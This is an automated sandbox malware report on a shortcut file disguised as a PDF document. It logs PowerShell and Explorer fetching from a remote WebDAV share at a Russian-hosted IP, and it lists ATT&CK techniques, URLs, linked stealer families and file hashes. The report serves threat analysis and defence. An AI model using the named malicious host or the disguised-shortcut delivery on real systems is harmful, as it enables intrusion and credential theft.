Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: \\77.105.161.194@80\file\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: \\77.105.161.194@80\fileJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\77.105.161.194@80\fileJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell
1
DLL Side-Loading
112
Process Injection
111
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
141
Virtualization/Sandbox Evasion
LSASS Memory121
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)112
Process Injection
Security Account Manager12
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS141
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk24%ReversingLabsShortcut.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://77.105.161.194/)0%Avira URL Cloudsafe
http://77.105.161.194/i0%Avira URL Cloudsafe
http://77.105.161.194/0%Avira URL Cloudsafe
http://77.105.161.194/%0%Avira URL Cloudsafe
http://77.105.161.194:80/0%Avira URL Cloudsafe
https://word.office.com(0%Avira URL Cloudsafe
https://powerpoint.office.come0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.msn.com
unknown
unknownfalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000003.00000003.1770312521.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000087C0000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://schemas.miexplorer.exe, 00000003.00000003.3817790448.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000088D6000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        https://api.msn.com/1$1explorer.exe, 00000003.00000003.3817790448.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1770312521.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.000000000882B000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://77.105.161.194/%explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.4132522253.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://g.live.com/odclientsettings/ProdV2.C:edb.log.4.drfalse
                high
                https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://excel.office.comexplorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://77.105.161.194/)explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://aka.ms/odirmexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://g.live.com/odclientsettings/Prod.C:edb.log.4.drfalse
                            high
                            https://g.live.com/odclientsettings/ProdV2edb.log.4.drfalse
                              high
                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1722938583.00000284B06C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                high
                                                http://77.105.161.194/explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://powerpoint.office.comeexplorer.exe, 00000003.00000003.1767052707.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775834386.00000000088D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://77.105.161.194:80/explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.ver)svchost.exe, 00000004.00000002.3389637968.00000284B0400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://77.105.161.194/iexplorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.micrexplorer.exe, 00000003.00000003.3817790448.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000088D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://outlook.comexplorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1722938583.00000284B06C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                                                                            high
                                                                            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.msn.com/explorer.exe, 00000003.00000003.3817790448.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1770312521.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.000000000882B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://word.office.com(explorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              77.105.161.194
                                                                                              unknownRussian Federation
                                                                                              43176ICOMF-ASRUtrue
                                                                                              IP
                                                                                              127.0.0.1
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1560046
                                                                                              Start date and time:2024-11-21 10:50:07 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 7m 21s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:21
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:.pdf.lnk
                                                                                              Detection:MAL
                                                                                              Classification:mal80.spyw.evad.winLNK@6/13@1/2
                                                                                              EGA Information:Failed
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 0
                                                                                              • Number of non-executed functions: 0
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .lnk
                                                                                              • Override analysis time to 240s for sample based on specific behavior
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.19.244.127
                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, r.bing.com, prod.fs.microsoft.com.akadns.net, api-msn-com.a-0003.a-msedge.net
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                              • VT rate limit hit for: #U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
                                                                                              TimeTypeDescription
                                                                                              04:51:00API Interceptor23x Sleep call for process: powershell.exe modified
                                                                                              04:51:02API Interceptor1995x Sleep call for process: explorer.exe modified
                                                                                              04:51:03API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              77.105.161.194bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                No context
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                ICOMF-ASRUbomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                • 77.105.161.194
                                                                                                nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                • 77.105.164.86
                                                                                                KKv1n1E6k9.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                • 77.105.164.86
                                                                                                SecuriteInfo.com.Trojan.Inject5.8572.27596.15929.exeGet hashmaliciousUnknownBrowse
                                                                                                • 77.105.164.24
                                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                • 77.105.164.24
                                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                                • 77.105.164.24
                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.21442.4076.exeGet hashmaliciousUnknownBrowse
                                                                                                • 77.105.172.225
                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.21442.4076.exeGet hashmaliciousUnknownBrowse
                                                                                                • 77.105.172.225
                                                                                                gobEmOm5sr.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                • 77.105.164.24
                                                                                                FileApp.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRATBrowse
                                                                                                • 77.105.164.24
                                                                                                No context
                                                                                                No context
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8192
                                                                                                Entropy (8bit):0.363788168458258
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):1.3107998378881938
                                                                                                Encrypted:false
